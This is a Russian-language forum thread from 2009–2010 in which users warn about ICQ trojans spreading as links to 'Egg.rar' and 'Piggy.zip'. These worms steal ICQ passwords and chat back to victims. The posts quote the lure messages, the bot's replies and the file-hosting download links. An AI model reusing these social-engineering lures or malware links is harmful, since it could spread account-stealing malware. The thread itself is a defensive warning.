    Возраст:
    43
    Рейтинг мнений: 1088
    Вес репутации: 343
    mazepa mazepa mazepa mazepa mazepa mazepa mazepa mazepa mazepa mazepa mazepa
    Очки: 19,911, Уровень: 89 Очки: 19,911, Уровень: 89 Очки: 19,911, Уровень: 89
    Активность: 25% Активность: 25% Активность: 25%
    По умолчанию Re: Новый ICQ троян #15
    МХ странный хостер. его иногда арбузы не прошибают, а иногда и помидора хватает. не факт, что прикроют.

    Жень, данные адреса своего исправь, или забанен будешь )
    __________________
    мой голова червяк прогрыз
    28.09.2009, 01:14
    Ответить с цитированием
  • Новое
    Аватар для NoName®

    NoName®
    Разработчик продукта

    Сообщений:
    949
    Регистрация:
    17.05.2006
    Возраст:
    41
    Рейтинг мнений: 1326
    Вес репутации: 371
    NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName® NoName®
    Очки: 30,958, Уровень: 100 Очки: 30,958, Уровень: 100 Очки: 30,958, Уровень: 100
    Активность: 5% Активность: 5% Активность: 5%
    По умолчанию Re: Новый ICQ троян #16
    Внимание!
    Буквально сегодня через ICQ и обменник file.qip.ru стал распространятся достаточно интересный вирус, интересен хотя бы тем, что он умеет говорить
    От многих знакомых по аське приходит ссылка

    начинается таким текстом:

    Код:
    Ссылка для скачивания файла Egg.rar
    h++p://file.qip.ru/file/104450980/99aeff39/Egg.html (950 кб)
    [-- Файл отправлен через file.qip.ru. Подробнее на сайте: http://file.qip.ru/ --]
    dkuk (12:13:33 19/10/2009)
    че?
    
     XYZ (12:13:42 19/10/2009)
    нечто позитивное )
    
     dkuk (12:13:47 19/10/2009)
    вирус?
    
     XYZ (12:13:54 19/10/2009)
    нет, ты не в церкви, тебя не обманут ))

    Будьте внимательны
    НЕ СКАЧИВАЙТЕ И НЕ ОТКРЫЙВАЙТЕ ФАЙЛ . Потеряете аську

    Источник : http://habrahabr.ru/blogs/infosecurity/70287/
    __________________
    19.10.2009, 14:24
    Ответить с цитированием
    9 пользователя(ей) добавили плюсы
    AABBCC (19.10.2009), glider (19.10.2009), LASDORF (19.10.2009), Morfeus (19.10.2009), Porter (19.10.2009), serega_zt (19.10.2009), shirokov (19.10.2009), Vasilio (19.10.2009), Xishnik787 (19.10.2009)
  • Новое
    Аватар для Morfeus

    Morfeus
    MCRF Инженер

    Сообщений:
    381
    Регистрация:
    10.02.2007
    Возраст:
    42
    Рейтинг мнений: 1424
    Вес репутации: 416
    Morfeus Morfeus Morfeus Morfeus Morfeus Morfeus Morfeus Morfeus Morfeus Morfeus Morfeus
    Очки: 33,999, Уровень: 100 Очки: 33,999, Уровень: 100 Очки: 33,999, Уровень: 100
    Активность: 0% Активность: 0% Активность: 0%
    По умолчанию Re: Новый ICQ троян #17

    ОФФтопик:
    Подтверждаю, приходило такое сообщение с полчаса назад от нескольких контактов из моего контакт-листа, причём даже с моей старой аси, хотя я её редко использую!

    19.10.2009, 15:04
    Ответить с цитированием
  • Новое
    Аватар для Фортэс

    Фортэс
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    368
    Регистрация:
    02.12.2008
    Возраст:
    44
    Рейтинг мнений: 486
    Вес репутации: 315
    Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс Фортэс
    Очки: 22,345, Уровень: 92 Очки: 22,345, Уровень: 92 Очки: 22,345, Уровень: 92
    Активность: 0% Активность: 0% Активность: 0%
    По умолчанию Re: Новый ICQ троян #18

    ОФФтопик:
    Если у кого-нибудь этот троян остался - вышлите мне в ЛС

    Цитата:
    Сообщение от habib301 Посмотреть сообщение
    тут уже все написано
    мне интересно что именно вирус делает, а не как восстановить пароль аськи


    Последний раз редактировалось Фортэс; 21.10.2009 в 18:09.
    21.10.2009, 16:30
    Ответить с цитированием
  • Новое
    Аватар для Habib

    Habib
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    743
    Регистрация:
    13.04.2008
    Возраст:
    36
    Рейтинг мнений: 1273
    Вес репутации: 315
    Habib Habib Habib Habib Habib Habib Habib Habib Habib Habib Habib
    Очки: 32,784, Уровень: 100 Очки: 32,784, Уровень: 100 Очки: 32,784, Уровень: 100
    Активность: 0% Активность: 0% Активность: 0%
    По умолчанию Re: Новый ICQ троян #19
    http://www.mobile-files.ru/forum/sho...d.php?t=232206 тут уже все написано

    Последний раз редактировалось Habib; 21.10.2009 в 17:19.
    21.10.2009, 16:46
    Ответить с цитированием
  • Новое
    Аватар для Recar

    Recar
    Участник
    Действительный участник ассоциации MCRF.RU

    Сообщений:
    173
    Регистрация:
    21.02.2007
    Возраст:
    42
    Рейтинг мнений:
    Вес репутации: 225
    Recar Recar Recar Recar Recar Recar
    Очки: 7,267, Уровень: 56 Очки: 7,267, Уровень: 56 Очки: 7,267, Уровень: 56
    Активность: 5% Активность: 5% Активность: 5%
    По умолчанию Re: Новый ICQ троян #20
    Внимание Свиной грипп в ICQ!!!!!

    Сейчас многим в аську от людей из контакт-листа (читай друзей, знакомых) приходит сообщение следующего содержания:

    *** (17:37:09 18/01/2010)
    Прямая ссылка для скачивания файла Piggy.zip
    eas***ad.ru/do****ad/? (1,95 мб)
    [-- Файл отправлен через сервис EasyLoad. Подробнее на сайте: easyload.ru/ --]

    Ни в коем случае не качайте, не ходите по ссылке. Если от кого-то пришло, значит он уже сходил и остался без пароля!

    Происходит следующее: вам показывают флэшку со свинюшкой и радуют сообщением, что вы заражены свиным H1N1, тут же аська закрывается с сообщением "Используется на другом компьютере" и всё

    И еще: вирусяка умный, может отвечать на Ваши вопросы типа "спам?", "что это?". Отвечает обычно что-то типа "это не спам, это я шлю о_О" и "флешка про свинью ) глянь )))"


    Вот еще ссылка на описание вируса http://privatedetective.habrahabr.ru/blog/81126/

    Код:
    Свиной грипп в ICQ 
    В рунете появился еще один вирус, рассылаемый через ICQ сеть. Называется он, судя по всему, H1N1.
    
    Вирус отличает интеллектуальность — он даже пытается разговаривать с людьми (отвечает на простейшие вопросы).
    
    Два лога и скриншот профиля под катом.
    
    UPD. При открытии файла «свинья» поменяет ваш пароль на ICQ и начнет рассылать себя от вашего имени.
    UPD2. Кто-нибудь из тех, кто минусует, поясните, пожалуйста, за что.
    UPD3. Если подхватили — спастись просто — восстановление пароля через icq.com срабатывает (если, конечно, uin привязан к e-mail).
    UPD4. Ну и плюйтесь себе. Больше предупреждать не буду — кармы на всех не хватит.
    
    Вот лог двух разговоров с разными контактами:
    
    первый:
    
    *** (17:37:09 18/01/2010)
    Прямая ссылка для скачивания файла Piggy.zip
    easyload.ru/download/?25596 (1,95 мб)
    [-- Файл отправлен через сервис EasyLoad. Подробнее на сайте: easyload.ru/ --]
    
    Private Detective (18:14:18 18/01/2010)
    спам
    
    *** (18:14:26 18/01/2010)
    это не спам, это я шлю о_О
    
    Private Detective (18:14:33 18/01/2010)
    что это?
    
    *** (18:14:41 18/01/2010)
    флешка про свинью ) глянь )))
    
    — второй:
    
    ***(18:10:15 18/01/2010)
    Прямая ссылка для скачивания файла Piggy.zip
    easyload.ru/download/?25596 (1,95 мб)
    [-- Файл отправлен через сервис EasyLoad. Подробнее на сайте: easyload.ru/ --]
    
    Private Detective (18:11:07 18/01/2010)
    что это?
    
    *** (18:11:15 18/01/2010)
    флешка про свинью ) глянь )))
    
    Private Detective (18:11:30 18/01/2010)
    спам же)
    
    Joint (18:11:39 18/01/2010)
    это не спам, это я шлю о_О
    
    Private Detective (18:11:57 18/01/2010)
    кто я? о_О
    
    — Профиль завирусованного отображается вот так:
    
    18.01.2010, 21:55
    Ответить с цитированием
Ответ

Метки
нет


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 

Ваши права в разделе
Вы можете создавать новые темы
Вы можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Новый движок архива. PGP Работа форума 17 11.11.2005 17:25
USB Smart: новый адрес сайта поддержки shirokov USB-Smart 0 25.08.2005 11:41
Новый хост!!! PGP Работа форума 15 30.07.2005 13:26


Текущее время: 06:02. Часовой пояс GMT +3.